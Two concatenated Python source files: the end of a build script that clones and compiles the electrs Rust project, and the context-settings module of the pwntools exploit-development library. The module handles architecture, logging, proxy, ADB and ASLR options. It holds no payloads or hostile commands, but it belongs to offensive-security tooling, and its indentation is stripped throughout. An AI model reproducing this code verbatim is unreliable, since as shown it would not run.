logging.error("Tip: On Debian/Ubuntu you need to install cargo")
bail("rust not found")
if shutil.which("clang") is None:
logging.error("Cannot find 'clang', will not be able to build {}".format(PROJECT_NAME))
logging.error("Tip: On Debian/Ubuntu you need to install clang")
bail("clang not found")
if not os.path.isdir(args.dst):
bail("--dst provided '%s' is not a directory", args.dst)
def clone_repo():
import git
logging.info("Cloning %s to %s", GIT_REPO, ELECTRS_DIR)
repo = git.Repo.clone_from(GIT_REPO, ELECTRS_DIR, branch=GIT_BRANCH)
def verify_repo(allow_modified):
import git
repo = git.Repo(ELECTRS_DIR)
if repo.is_dirty():
logging.error("Validation failed - %s has local modifications.", ELECTRS_DIR)
allow_modified or bail("Bailing")
if repo.head.object.hexsha != EXPECT_HEAD:
# TODO: Add command line option to reset HEAD to GIT_BRANCH at EXPECT_HEAD
logging.error("Validation failed - %s HEAD differs from expected (%s vs %s)",
PROJECT_NAME, repo.head.object.hexsha, EXPECT_HEAD)
allow_modified or bail("Bailing")
def output_reader(pipe, queue):
try:
with pipe:
for l in iter(pipe.readline, b''):
queue.put(l)
finally:
queue.put(None)
def cargo_run(args):
import subprocess
from threading import Thread
from queue import Queue
cargo = shutil.which("cargo")
args = [cargo] + args
logging.info("Running %s", args)
assert cargo is not None
p = subprocess.Popen(args, cwd = ELECTRS_DIR,
stdout = subprocess.PIPE, stderr = subprocess.PIPE)
q = Queue()
Thread(target = output_reader, args = [p.stdout, q]).start()
Thread(target = output_reader, args = [p.stderr, q]).start()
for line in iter(q.get, None):
logging.info(line.decode('utf-8').rstrip())
p.wait()
rc = p.returncode
assert rc is not None
if rc != 0:
bail("cargo failed with return code %s", rc)
def get_target(makefile_target):
# Try to map target passed from makefile to the equivalent in rust
# To see supported targets, run: rustc --print target-list
target_map = {
'x86_64-pc-linux-gnu' : 'x86_64-unknown-linux-gnu',
'i686-pc-linux-gnu' : 'i686-unknown-linux-gnu'
}
if makefile_target in target_map:
return target_map[makefile_target]
if makefile_target in target_map.values():
return makefile_target
logging.warn("Target %s is not mapped, passing it rust and hoping it works"
% makefile_target)
return makefile_target
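# Illustrative calls (not executed by the build; results follow from target_map):
#   get_target('x86_64-pc-linux-gnu')        -> 'x86_64-unknown-linux-gnu'
#   get_target('i686-unknown-linux-gnu')     -> 'i686-unknown-linux-gnu'  (already a rust triple)
#   get_target('aarch64-unknown-linux-gnu')  -> passed through unchanged, with a warning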
check_dependencies()
if not os.path.exists(ELECTRS_DIR):
clone_repo()
verify_repo(args.allow_modified)
def build_flags(debug, target):
flags = ["--target={}".format(get_target(target))]
if debug:
return flags
return flags + ["--release"]
cargo_run(["build", "--verbose", "--locked"] + build_flags(args.debug, args.target))
cargo_run(["test", "--verbose", "--locked"] + build_flags(args.debug, args.target))
def build_dir(debug):
if debug:
return "debug"
return "release"
src = os.path.join(ELECTRS_DIR, "target", get_target(args.target), build_dir(args.debug), ELECTRS_BIN)
logging.info("Copying %s to %s", src, args.dst)
shutil.copy(src, args.dst)
logging.info("Done")
|
__init__.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Implements context management so that nested/scoped contexts and threaded
contexts work properly and as expected.
"""
from __future__ import absolute_import
import collections
import functools
import logging
import os
import platform
import socket
import stat
import string
import subprocess
import sys
import threading
import time
import socks
from pwnlib.config import register_config
from pwnlib.device import Device
from pwnlib.timeout import Timeout
__all__ = ['context', 'ContextType', 'Thread']
_original_socket = socket.socket
class _devnull(object):
name = None
def write(self, *a, **kw): pass
def read(self, *a, **kw): return ''
def flush(self, *a, **kw): pass
def close(self, *a, **kw): pass
class _defaultdict(dict):
"""
Dictionary which loads missing keys from another dictionary.
This is necessary because the ``default_factory`` method of
:class:`collections.defaultdict` does not provide the key.
Examples:
>>> a = {'foo': 'bar'}
>>> b = pwnlib.context._defaultdict(a)
>>> b['foo']
'bar'
>>> 'foo' in b
False
>>> b['foo'] = 'baz'
>>> b['foo']
'baz'
>>> del b['foo']
>>> b['foo']
'bar'
>>> a = {'foo': 'bar'}
>>> b = pwnlib.context._defaultdict(a)
>>> b['baz'] #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: 'baz'
"""
def __init__(self, default=None):
super(_defaultdict, self).__init__()
if default is None:
default = {}
self.default = default
def __missing__(self, key):
return self.default[key]
class _DictStack(object):
"""
Manages a dictionary-like object, permitting saving and restoring from
a stack of states via :func:`push` and :func:`pop`.
The underlying object used as ``default`` must implement ``copy``, ``clear``,
and ``update``.
Examples:
>>> t = pwnlib.context._DictStack(default={})
>>> t['key'] = 'value'
>>> t
{'key': 'value'}
>>> t.push()
>>> t
{'key': 'value'}
>>> t['key'] = 'value2'
>>> t
{'key': 'value2'}
>>> t.pop()
>>> t
{'key': 'value'}
"""
def __init__(self, default):
self._current = _defaultdict(default)
self.__stack = []
def push(self):
self.__stack.append(self._current.copy())
def pop(self):
self._current.clear()
self._current.update(self.__stack.pop())
def copy(self):
return self._current.copy()
# Pass-through container emulation routines
def __len__(self): return self._current.__len__()
def __delitem__(self, k): return self._current.__delitem__(k)
def __getitem__(self, k): return self._current.__getitem__(k)
def __setitem__(self, k, v): return self._current.__setitem__(k, v)
def __contains__(self, k): return self._current.__contains__(k)
def __iter__(self): return self._current.__iter__()
def __repr__(self): return self._current.__repr__()
def __eq__(self, other): return self._current.__eq__(other)
# Required for keyword expansion operator ** to work
def keys(self): return self._current.keys()
def values(self): return self._current.values()
def items(self): return self._current.items()
class _Tls_DictStack(threading.local, _DictStack):
"""
Per-thread implementation of :class:`_DictStack`.
Examples:
>>> t = pwnlib.context._Tls_DictStack({})
>>> t['key'] = 'value'
>>> print t
{'key': 'value'}
>>> def p(): print t
>>> thread = threading.Thread(target=p)
>>> _ = (thread.start(), thread.join())
{}
"""
pass
def _validator(validator):
"""
Validator that is tightly coupled to the implementation
of the classes here.
This expects that the object has a ._tls property which
is of type _DictStack.
"""
name = validator.__name__
doc = validator.__doc__
def fget(self):
return self._tls[name]
def fset(self, val):
self._tls[name] = validator(self, val)
def fdel(self):
self._tls._current.pop(name,None)
return property(fget, fset, fdel, doc)
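# Illustrative sketch (hypothetical class, not part of this module): _validator
# turns a validation method into a property backed by the thread-local _tls
# stack, which is exactly how ContextType below defines arch, bits, endian, etc.
#
#   class Example(object):
#       __slots__ = '_tls',
#       @_validator
#       def bits(self, bits):
#           return int(bits)
#
# Assigning Example().bits runs the validator and stores its return value in
# _tls; reading looks the value up there; 'del' drops the override so the
# default shows through again.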
class Thread(threading.Thread):
"""
Instantiates a context-aware thread, which inherits its context when it is
instantiated. The class can be accessed both on the context module as
`pwnlib.context.Thread` and on the context singleton object inside the
context module as `pwnlib.context.context.Thread`.
Threads created by using the native :class:`threading.Thread` will have a
clean (default) context.
Regardless of the mechanism used to create any thread, the context
is de-coupled from the parent thread, so changes do not cascade
to child or parent.
Saves a copy of the context when instantiated (at ``__init__``)
and updates the new thread's context before passing control
to the user code via ``run`` or ``target=``.
Examples:
>>> context.clear()
>>> context.update(arch='arm')
>>> def p():
... print context.arch
... context.arch = 'mips'
... print context.arch
>>> # Note that a normal Thread starts with a clean context
>>> # (i386 is the default architecture)
>>> t = threading.Thread(target=p)
>>> _=(t.start(), t.join())
i386
mips
>>> # Note that the main Thread's context is unchanged
>>> print context.arch
arm
>>> # Note that a context-aware Thread receives a copy of the context
>>> t = pwnlib.context.Thread(target=p)
>>> _=(t.start(), t.join())
arm
mips
>>> # Again, the main thread is unchanged
>>> print context.arch
arm
Implementation Details:
This class is implemented by hooking the private function
:func:`threading.Thread._Thread__bootstrap`, which is called before
passing control to :func:`threading.Thread.run`.
This could be done by overriding ``run`` itself, but we would have to
ensure that all uses of the class would only ever use the keyword
``target=`` for ``__init__``, or that all subclasses invoke
``super(Subclass, self).set_up_context()`` or similar.
"""
def __init__(self, *args, **kwargs):
super(Thread, self).__init__(*args, **kwargs)
self.old = context.copy()
def __bootstrap(self):
"""
Implementation Details:
This only works because the class is named ``Thread``.
If its name is changed, we have to implement this hook
differently.
"""
context.update(**self.old)
super(Thread, self).__bootstrap()
def _longest(d):
"""
Returns an OrderedDict with the contents of the input dictionary ``d``
sorted by the length of the keys, in descending order.
This is useful for performing substring matching via ``str.startswith``,
as it ensures the most complete match will be found.
>>> data = {'a': 1, 'bb': 2, 'ccc': 3}
>>> pwnlib.context._longest(data) == data
True
>>> for i in pwnlib.context._longest(data):
... print i
ccc
bb
a
"""
return collections.OrderedDict((k,d[k]) for k in sorted(d, key=len, reverse=True))
class TlsProperty(object):
def __get__(self, obj, objtype=None):
return obj._tls
class ContextType(object):
r"""
Class for specifying information about the target machine.
Intended for use as a pseudo-singleton through the global
variable :data:`.context`, available via
``from pwn import *`` as ``context``.
The context is usually specified at the top of the Python file for clarity. ::
#!/usr/bin/env python
context.update(arch='i386', os='linux')
Currently supported properties and their defaults are listed below.
The defaults are inherited from :data:`pwnlib.context.ContextType.defaults`.
Additionally, the context is thread-aware when using
:class:`pwnlib.context.Thread` instead of :class:`threading.Thread`
(all internal ``pwntools`` threads use the former).
The context is also scope-aware by using the ``with`` keyword.
Examples:
>>> context.clear()
>>> context.update(os='linux') # doctest: +ELLIPSIS
>>> context.os == 'linux'
True
>>> context.arch = 'arm'
>>> vars(context) == {'arch': 'arm', 'bits': 32, 'endian': 'little', 'os': 'linux'}
True
>>> context.endian
'little'
>>> context.bits
32
>>> def nop():
... print pwnlib.asm.asm('nop').encode('hex')
>>> nop()
00f020e3
>>> with context.local(arch = 'i386'):
... nop()
90
>>> from pwnlib.context import Thread as PwnThread
>>> from threading import Thread as NormalThread
>>> with context.local(arch = 'mips'):
... pwnthread = PwnThread(target=nop)
... thread = NormalThread(target=nop)
>>> # Normal thread uses the default value for arch, 'i386'
>>> _=(thread.start(), thread.join())
90
>>> # Pwnthread uses the correct context from creation-time
>>> _=(pwnthread.start(), pwnthread.join())
00000000
>>> nop()
00f020e3
"""
#
# Use of 'slots' is a heavy-handed way to prevent accidents
# like 'context.architecture=' instead of 'context.arch='.
#
# Setting any properties on a ContextType object will throw an
# exception.
#
__slots__ = '_tls',
#: Default values for :class:`pwnlib.context.ContextType`
defaults = {
'adb_host': 'localhost',
'adb_port': 5037,
'arch': 'i386',
'aslr': True,
'binary': None,
'bits': 32,
'buffer_size': 4096,
'cyclic_alphabet': string.ascii_lowercase,
'cyclic_size': 4,
'delete_corefiles': False,
'device': os.getenv('ANDROID_SERIAL', None) or None,
'endian': 'little',
'gdbinit': "",
'kernel': None,
'log_level': logging.INFO,
'log_file': _devnull(),
'log_console': sys.stdout,
'randomize': False,
'rename_corefiles': True,
'newline': '\n',
'noptrace': False,
'os': 'linux',
'proxy': None,
'signed': False,
'terminal': tuple(),
'timeout': Timeout.maximum,
}
#: Valid values for :meth:`pwnlib.context.ContextType.os`
oses = sorted(('linux','freebsd','windows','cgc','android'))
big_32 = {'endian': 'big', 'bits': 32}
big_64 = {'endian': 'big', 'bits': 64}
little_8 = {'endian': 'little', 'bits': 8}
little_16 = {'endian': 'little', 'bits': 16}
little_32 = {'endian': 'little', 'bits': 32}
little_64 = {'endian': 'little', 'bits': 64}
#: Keys are valid values for :meth:`pwnlib.context.ContextType.arch`.
#
#: Values are defaults which are set when
#: :attr:`pwnlib.context.ContextType.arch` is set
architectures = _longest({
'aarch64': little_64,
'alpha': little_64,
'avr': little_8,
'amd64': little_64,
'arm': little_32,
'cris': little_32,
'i386': little_32,
'ia64': big_64,
'm68k': big_32,
'mips': little_32,
'mips64': little_64,
'msp430': little_16,
'powerpc': big_32,
'powerpc64': big_64,
's390': big_32,
'sparc': big_32,
'sparc64': big_64,
'thumb': little_32,
'vax': little_32,
})
#: Valid values for :attr:`endian`
endiannesses = _longest({
'be': 'big',
'eb': 'big',
'big': 'big',
'le': 'little',
'el': 'little',
'little': 'little'
})
#: Valid string values for :attr:`signed`
signednesses = {
'unsigned': False,
'no': False,
'yes': True,
'signed': True
}
valid_signed = sorted(signednesses)
def __init__(self, **kwargs):
"""
Initialize the ContextType structure.
All keyword arguments are passed to :func:`update`.
"""
self._tls = _Tls_DictStack(_defaultdict(ContextType.defaults))
self.update(**kwargs)
def copy(self):
"""copy() -> dict
Returns a copy of the current context as a dictionary.
Examples:
>>> context.clear()
>>> context.os = 'linux'
>>> vars(context) == {'os': 'linux'}
True
"""
return self._tls.copy()
@property
def __dict__(self):
return self.copy()
def update(self, *args, **kwargs):
"""
Convenience function, which is shorthand for setting multiple
variables at once.
It is a simple shorthand such that::
context.update(os = 'linux', arch = 'arm', ...)
is equivalent to::
context.os = 'linux'
context.arch = 'arm'
...
The following syntax is also valid::
context.update({'os': 'linux', 'arch': 'arm'})
Arguments:
kwargs: Variables to be assigned in the environment.
Examples:
>>> context.clear()
>>> context.update(arch = 'i386', os = 'linux')
>>> context.arch, context.os
('i386', 'linux')
"""
for arg in args:
self.update(**arg)
for k,v in kwargs.items():
setattr(self,k,v)
def __repr__(self):
v = sorted("%s = %r" % (k,v) for k,v in self._tls._current.items())
return '%s(%s)' % (self.__class__.__name__, ', '.join(v))
def local(self, function=None, **kwargs):
"""local(**kwargs) -> context manager
Create a context manager for use with the ``with`` statement.
For more information, see the example below or PEP 343.
Arguments:
kwargs: Variables to be assigned in the new environment.
Returns:
ContextType manager for managing the old and new environment.
Examples:
>>> context.clear()
>>> context.timeout = 1
>>> context.timeout == 1
True
>>> print context.timeout
1.0
>>> with context.local(timeout = 2):
... print context.timeout
... context.timeout = 3
... print context.timeout
2.0
3.0
>>> print context.timeout
1.0
"""
class LocalContext(object):
def __enter__(a):
self._tls.push()
self.update(**{k:v for k,v in kwargs.items() if v is not None})
return self
def __exit__(a, *b, **c):
self._tls.pop()
def __call__(self, function, *a, **kw):
@functools.wraps(function)
def inner(*a, **kw):
with self:
return function(*a, **kw)
return inner
return LocalContext()
@property
def silent(self, function=None):
"""Disable all non-error logging within the enclosed scope.
"""
return self.local(function, log_level='error')
@property
def quiet(self, function=None):
"""Disables all non-error logging within the enclosed scope,
*unless* the debugging level is set to 'debug' or lower."""
level = 'error'
if context.log_level <= logging.DEBUG:
level = None
return self.local(function, log_level=level)
def quietfunc(self, function):
"""Similar to :attr:`quiet`, but wraps a whole function."""
@functools.wraps(function)
def wrapper(*a, **kw):
level = 'error'
if context.log_level <= logging.DEBUG:
level = None
with self.local(function, log_level=level):
return function(*a, **kw)
return wrapper
@property
def verbose(self):
"""Enable all logging within the enclosed scope.
"""
return self.local(log_level='debug')
def clear(self, *a, **kw):
"""
Clears the contents of the context.
All values are set to their defaults.
Arguments:
a: Arguments passed to ``update``
kw: Arguments passed to ``update``
Examples:
>>> # Default value
>>> context.clear()
>>> context.arch == 'i386'
True
>>> context.arch = 'arm'
>>> context.arch == 'i386'
False
>>> context.clear()
>>> context.arch == 'i386'
True
"""
self._tls._current.clear()
if a or kw:
self.update(*a, **kw)
@property
def native(self):
if context.os in ('android', 'cgc'):
return False
arch = context.arch
with context.local(arch = platform.machine()):
platform_arch = context.arch
if arch in ('i386', 'amd64') and platform_arch in ('i386', 'amd64'):
return True
return arch == platform_arch
@_validator
def arch(self, arch):
"""
Target binary architecture.
Allowed values are listed in :attr:`pwnlib.context.ContextType.architectures`.
Side Effects:
If an architecture is specified which also implies additional
attributes (e.g. 'amd64' implies 64-bit words, 'powerpc' implies
big-endian), these attributes will be set on the context if a
user has not already set a value.
The following properties may be modified.
- :attr:`bits`
- :attr:`endian`
Raises:
AttributeError: An invalid architecture was specified
Examples:
>>> context.clear()
>>> context.arch == 'i386' # Default architecture
True
>>> context.arch = 'mips'
>>> context.arch == 'mips'
True
>>> context.arch = 'doge' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: arch must be one of ['aarch64', ..., 'thumb']
>>> context.arch = 'ppc'
>>> context.arch == 'powerpc' # Aliased architecture
True
>>> context.clear()
>>> context.bits == 32 # Default value
True
>>> context.arch = 'amd64'
>>> context.bits == 64 # New value
True
Note that expressly setting :attr:`bits` means that we use
that value instead of the default
>>> context.clear()
>>> context.bits = 32
>>> context.arch = 'amd64'
>>> context.bits == 32
True
Setting the architecture can override the defaults for
both :attr:`endian` and :attr:`bits`
>>> context.clear()
>>> context.arch = 'powerpc64'
>>> vars(context) == {'arch': 'powerpc64', 'bits': 64, 'endian': 'big'}
True
"""
# Lowercase
arch = arch.lower()
# Attempt to perform convenience and legacy compatibility transformations.
# We have to make sure that x86_64 appears before x86 for this to work correctly.
transform = [('ppc64', 'powerpc64'),
('ppc', 'powerpc'),
('x86_64', 'amd64'),
('x86', 'i386'),
('i686', 'i386'),
('armeabi', 'arm'),
('arm64', 'aarch64')]
for k, v in transform:
if arch.startswith(k):
arch = v
break
try:
defaults = ContextType.architectures[arch]
except KeyError:
raise AttributeError('arch must be one of %r' % sorted(ContextType.architectures))
for k, v in defaults.items():
if k not in self._tls:
self._tls[k] = v
return arch
@_validator
def aslr(self, aslr):
"""
ASLR settings for new processes.
If :const:`False`, attempt to disable ASLR in all processes which are
created via ``personality`` (``setarch -R``) and ``setrlimit``
(``ulimit -s unlimited``).
The ``setarch`` changes are lost if a ``setuid`` binary is executed.
"""
return bool(aslr)
@_validator
def kernel(self, arch):
"""
Target machine's kernel architecture.
Usually, this is the same as ``arch``, except when
running a 32-bit binary on a 64-bit kernel (e.g. i386-on-amd64).
Even then, this doesn't matter much -- only when the segment
registers need to be known
"""
with context.local(arch=arch):
return context.arch
@_validator
def bits(self, bits):
"""
Target machine word size, in bits (i.e. the size of general purpose registers).
The default value is ``32``, but changes according to :attr:`arch`.
Examples:
>>> context.clear()
>>> context.bits == 32
True
>>> context.bits = 64
>>> context.bits == 64
True
>>> context.bits = -1 #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: bits must be > 0 (-1)
"""
bits = int(bits)
if bits <= 0:
raise AttributeError("bits must be > 0 (%r)" % bits)
return bits
@_validator
def binary(self, binary):
"""
Infer target architecture, bit-width, and endianness from a binary file.
Data type is a :class:`pwnlib.elf.ELF` object.
Examples:
>>> context.clear()
>>> context.arch, context.bits
('i386', 32)
>>> context.binary = '/bin/bash'
>>> context.arch, context.bits
('amd64', 64)
>>> context.binary
ELF('/bin/bash')
"""
# Cyclic imports... sorry Idolf.
from pwnlib.elf import ELF
if not isinstance(binary, ELF):
binary = ELF(binary)
self.arch = binary.arch
self.bits = binary.bits
self.endian = binary.endian
self.os = binary.os
return binary
@property
def bytes(self):
"""
Target machine word size, in bytes (i.e. the size of general purpose registers).
This is a convenience wrapper around ``bits / 8``.
Examples:
>>> context.bytes = 1
>>> context.bits == 8
True
>>> context.bytes = 0 #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: bits must be > 0 (0)
"""
return self.bits/8
@bytes.setter
def bytes(self, value):
self.bits = value*8
@_validator
def endian(self, endianness):
"""
Endianness of the target machine.
The default value is ``'little'``, but changes according to :attr:`arch`.
Raises:
AttributeError: An invalid endianness was provided
Examples:
>>> context.clear()
>>> context.endian == 'little'
True
>>> context.endian = 'big'
>>> context.endian
'big'
>>> context.endian = 'be'
>>> context.endian == 'big'
True
>>> context.endian = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: endian must be one of ['be', 'big', 'eb', 'el', 'le', 'little']
"""
endian = endianness.lower()
if endian not in ContextType.endiannesses:
raise AttributeError("endian must be one of %r" % sorted(ContextType.endiannesses))
return ContextType.endiannesses[endian]
@_validator
def log_level(self, value):
"""
Sets the verbosity of ``pwntools`` logging mechanism.
More specifically it controls the filtering of messages that happens
inside the handler for logging to the screen. So if you want to e.g. log
all messages to a file, then this attribute makes no difference to you.
Valid values are specified by the standard Python ``logging`` module.
Default value is set to ``INFO``.
Examples:
>>> context.log_level = 'error'
>>> context.log_level == logging.ERROR
True
>>> context.log_level = 10
>>> context.log_level = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: log_level must be an integer or one of ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
"""
# If it can be converted into an int, success
try: return int(value)
except ValueError: pass
# If it is defined in the logging module, success
try: return getattr(logging, value.upper())
except AttributeError: pass
# Otherwise, fail
level_names = filter(lambda x: isinstance(x,str), logging._levelNames)
permitted = sorted(level_names)
raise AttributeError('log_level must be an integer or one of %r' % permitted)
@_validator
def log_file(self, value):
r"""
Sets the target file for all logging output.
Works in a similar fashion to :attr:`log_level`.
Examples:
>>> context.log_file = 'foo.txt' #doctest: +ELLIPSIS
>>> log.debug('Hello!') #doctest: +ELLIPSIS
>>> with context.local(log_level='ERROR'): #doctest: +ELLIPSIS
... log.info('Hello again!')
>>> with context.local(log_file='bar.txt'):
... log.debug('Hello from bar!')
>>> log.info('Hello from foo!')
>>> file('foo.txt').readlines()[-3] #doctest: +ELLIPSIS
'...:DEBUG:...:Hello!\n'
>>> file('foo.txt').readlines()[-2] #doctest: +ELLIPSIS
'...:INFO:...:Hello again!\n'
>>> file('foo.txt').readlines()[-1] #doctest: +ELLIPSIS
'...:INFO:...:Hello from foo!\n'
>>> file('bar.txt').readlines()[-1] #doctest: +ELLIPSIS
'...:DEBUG:...:Hello from bar!\n'
"""
if isinstance(value, (str,unicode)):
modes = ('w', 'wb', 'a', 'ab')
# check if mode was specified as "[value],[mode]"
if ',' not in value:
value += ',a'
filename, mode = value.rsplit(',', 1)
value = open(filename, mode)
elif not isinstance(value, (file)):
raise AttributeError('log_file must be a file')
# Is this the same file we already have open?
# If so, don't re-print the banner.
if self.log_file and not isinstance(self.log_file, _devnull):
a = os.fstat(value.fileno()).st_ino
b = os.fstat(self.log_file.fileno()).st_ino
if a == b:
return self.log_file
iso_8601 = '%Y-%m-%dT%H:%M:%S'
lines = [
'=' * 78,
' Started at %s ' % time.strftime(iso_8601),
' sys.argv = [',
]
for arg in sys.argv:
lines.append(' %r,' % arg)
lines.append(' ]')
lines.append('=' * 78)
for line in lines:
value.write('=%-78s=\n' % line)
value.flush()
return value
@_validator
def log_console(self, stream):
"""
Sets the default logging console target.
Examples:
>>> context.log_level = 'warn'
>>> log.warn("Hello")
[!] Hello
>>> context.log_console=open('/dev/null', 'w')
>>> log.warn("Hello")
>>> context.clear()
"""
if isinstance(stream, str):
stream = open(stream, 'wt')
return stream
@property
def mask(self):
return (1 << self.bits) - 1
@_validator
def os(self, os):
"""
Operating system of the target machine.
The default value is ``linux``.
Allowed values are listed in :attr:`pwnlib.context.ContextType.oses`.
Examples:
>>> context.os = 'linux'
>>> context.os = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: os must be one of ['android', 'cgc', 'freebsd', 'linux', 'windows']
"""
os = os.lower()
if os not in ContextType.oses:
raise AttributeError("os must be one of %r" % ContextType.oses)
return os
@_validator
def randomize(self, r):
"""
Global flag that lots of things should be randomized.
"""
return bool(r)
@_validator
def signed(self, signed):
"""
Signed-ness for packing operation when it's not explicitly set.
Can be set to any non-string truthy value, or the specific string
values ``'signed'`` or ``'unsigned'`` which are converted into
:const:`True` and :const:`False` correspondingly.
Examples:
>>> context.signed
False
>>> context.signed = 1
>>> context.signed
True
>>> context.signed = 'signed'
>>> context.signed
True
>>> context.signed = 'unsigned'
>>> context.signed
False
>>> context.signed = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: signed must be one of ['no', 'signed', 'unsigned', 'yes'] or a non-string truthy value
"""
try: signed = ContextType.signednesses[signed]
except KeyError: pass
if isinstance(signed, str):
raise AttributeError('signed must be one of %r or a non-string truthy value' % sorted(ContextType.signednesses))
return bool(signed)
@_validator
def timeout(self, value=Timeout.default):
"""
Default amount of time to wait for a blocking operation before it times out,
specified in seconds.
The default value is to have an infinite timeout.
See :class:`pwnlib.timeout.Timeout` for additional information on
valid values.
"""
return Timeout(value).timeout
@_validator
def terminal(self, value):
"""
Default terminal used by :meth:`pwnlib.util.misc.run_in_new_terminal`.
Can be a string or an iterable of strings. In the latter case the first
entry is the terminal and the rest are default arguments.
"""
if isinstance(value, (str, unicode)):
return [value]
return value
@property
def abi(self):
return self._abi
@_validator
def proxy(self, proxy):
"""
Default proxy for all socket connections.
Accepts either a string (hostname or IP address) for a SOCKS5 proxy on
the default port, **or** a ``tuple`` passed to ``socks.set_default_proxy``,
e.g. ``(socks.SOCKS4, 'localhost', 1234)``.
>>> context.proxy = 'localhost' #doctest: +ELLIPSIS
>>> r=remote('google.com', 80)
Traceback (most recent call last):
...
ProxyConnectionError: Error connecting to SOCKS5 proxy localhost:1080: [Errno 111] Connection refused
>>> context.proxy = None
>>> r=remote('google.com', 80, level='error')
"""
if not proxy:
socket.socket = _original_socket
return None
if isinstance(proxy, str):
proxy = (socks.SOCKS5, proxy)
if not isinstance(proxy, collections.Iterable):
raise AttributeError('proxy must be a string hostname, or tuple of arguments for socks.set_default_proxy')
socks.set_default_proxy(*proxy)
socket.socket = socks.socksocket
return proxy
@_validator
def noptrace(self, value):
"""Disable all actions which rely on ptrace.
This is useful for switching between local exploitation with a debugger,
and remote exploitation (without a debugger).
This option can be set with the ``NOPTRACE`` command-line argument.
"""
return bool(value)
@_validator
def adb_host(self, value):
"""Sets the target host which is used for ADB.
This is useful for Android exploitation.
The default value is inherited from ANDROID_ADB_SERVER_HOST, or set
to the default 'localhost'.
"""
return str(value)
@_validator
def adb_port(self, value):
"""Sets the target port which is used for ADB.
This is useful for Android exploitation.
The default value is inherited from ANDROID_ADB_SERVER_PORT, or set
to the default 5037.
"""
return int(value)
@_validator
def device(self, device):
"""Sets the device being operated on.
"""
if isinstance(device, Device):
self.arch = device.arch or self.arch
self.bits = device.bits or self.bits
self.endian = device.endian or self.endian
self.os = device.os or self.os
elif isinstance(device, str):
device = Device(device)
elif device is not None:
raise AttributeError("device must be either a Device object or a serial number as a string")
return device
@property
def adb(self):
"""Returns an argument array for connecting to adb.
Unless ``$ADB_PATH`` is set, uses the default ``adb`` binary in ``$PATH``.
"""
ADB_PATH = os.environ.get('ADB_PATH', 'adb')
command = [ADB_PATH]
if self.adb_host != self.defaults['adb_host']:
command += ['-H', self.adb_host]
if self.adb_port != self.defaults['adb_port']:
command += ['-P', str(self.adb_port)]
if self.device:
command += ['-s', str(self.device)]
return command
@_validator
def buffer_size(self, size):
"""Internal buffer size to use for :class:`pwnlib.tubes.tube.tube` objects.
This is not the maximum size of the buffer, but this is the amount of data
which is passed to each raw ``read`` syscall (or equivalent).
"""
return int(size)
@property
def cache_dir(self):
"""Directory used for caching data.
Note:
May be either a path string, or :const:`None`.
Example:
>>> cache_dir = context.cache_dir
>>> cache_dir is not None
True
>>> os.chmod(cache_dir, 0o000)
>>> context.cache_dir is None
True
>>> os.chmod(cache_dir, 0o755)
>>> cache_dir == context.cache_dir
True
"""
home = os.path.expanduser('~')
if not os.access(home, os.W_OK):
return None
cache = os.path.join(home, '.pwntools-cache')
if not os.path.exists(cache):
try:
os.mkdir(cache)
except OSError:
return None
# Some wargames e.g. pwnable.kr have created dummy directories
# which cannot be modified by the user account (owned by root).
if not os.access(cache, os.W_OK):
return None
return cache
@_validator
def delete_corefiles(self, v):
"""Whether pwntools automatically deletes corefiles after exiting.
This only affects corefiles accessed via :attr:`.process.corefile`.
Default value is ``False``.
"""
return bool(v)
@_validator
def rename_corefiles(self, v):
"""Whether pwntools automatically renames corefiles.
This is useful for two things:
- Prevent corefiles from being overwritten, if ``kernel.core_pattern``
is something simple like ``"core"``.
- Ensure corefiles are generated, if ``kernel.core_pattern`` uses ``apport``,
which refuses to overwrite any existing files.
This only affects corefiles accessed via :attr:`.process.corefile`.
Default value is ``True``.
"""
return bool(v)
@_validator
def gdbinit(self, value):
"""Path to the gdbinit that is used when running GDB locally.
This is useful if you want pwntools-launched GDB to include some additional modules,
like PEDA, but you do not want to have GDB include them by default.
The setting will only apply when GDB is launched locally since remote hosts may not have
the necessary requirements for the gdbinit.
If set to an empty string, GDB will use the default `~/.gdbinit`.
Default value is ``""``.
"""
return str(value)
@_validator
def cyclic_alphabet(self, alphabet):
"""Cyclic alphabet.
Default value is `string.ascii_lowercase`.
"""
# Do not allow multiple occurrences
if len(set(alphabet)) != len(alphabet):
raise AttributeError("cyclic alphabet cannot contain duplicates")
return str(alphabet)
@_validator
def cyclic_size(self, size):
"""Cyclic pattern size.
Default value is `4`.
"""
size = int(size)
if size > self.bytes:
raise AttributeError("cyclic pattern size cannot be larger than word size")
return size
#*************************************************************************
# ALIASES
#*************************************************************************
#
# These fields are aliases for fields defined above, either for
# convenience or compatibility.
#
#*************************************************************************
def __call__(self, **kwargs):
"""
Alias for :meth:`pwnlib.context.ContextType.update`
"""
return self.update(**kwargs)
def reset_local(self):
"""
Deprecated. Use :meth:`clear`.
"""
self.clear()
@property
def endianness(self):
"""
Legacy alias for :attr:`endian`.
Examples:
>>> context.endian == context.endianness
True
"""
return self.endian
@endianness.setter
def endianness(self, value):
self.endian = value
@property
def sign(self):
"""
Alias for :attr:`signed`
"""
return self.signed
@sign.setter
def sign(self, value):
self.signed = value
@property
def signedness(self):
"""
Alias for :attr:`signed`
"""
return self.signed
@signedness.setter
def signedness(self, value):
self.signed = value
@property
def word_size(self):
"""
Alias for :attr:`bits`
"""
return self.bits
@word_size.setter
def word_size(self, value):
self.bits = value
Thread = Thread
#: Global :class:`.ContextType` object, used to store commonly-used pwntools settings.
#:
#: In most cases, the context is used to infer default variables values.
#: For example, :func:`.asm` can take an ``arch`` parameter as a
#: keyword argument.
#:
#: If it is not supplied, the ``arch`` specified by ``context`` is used instead.
#:
#: Consider it a shorthand to passing ``os=`` and ``arch=`` to every single
#: function call.
context = ContextType()
# Inherit default ADB values
if 'ANDROID_ADB_SERVER_HOST' in os.environ:
context.adb_host = os.environ.get('ANDROID_ADB_SERVER_HOST')
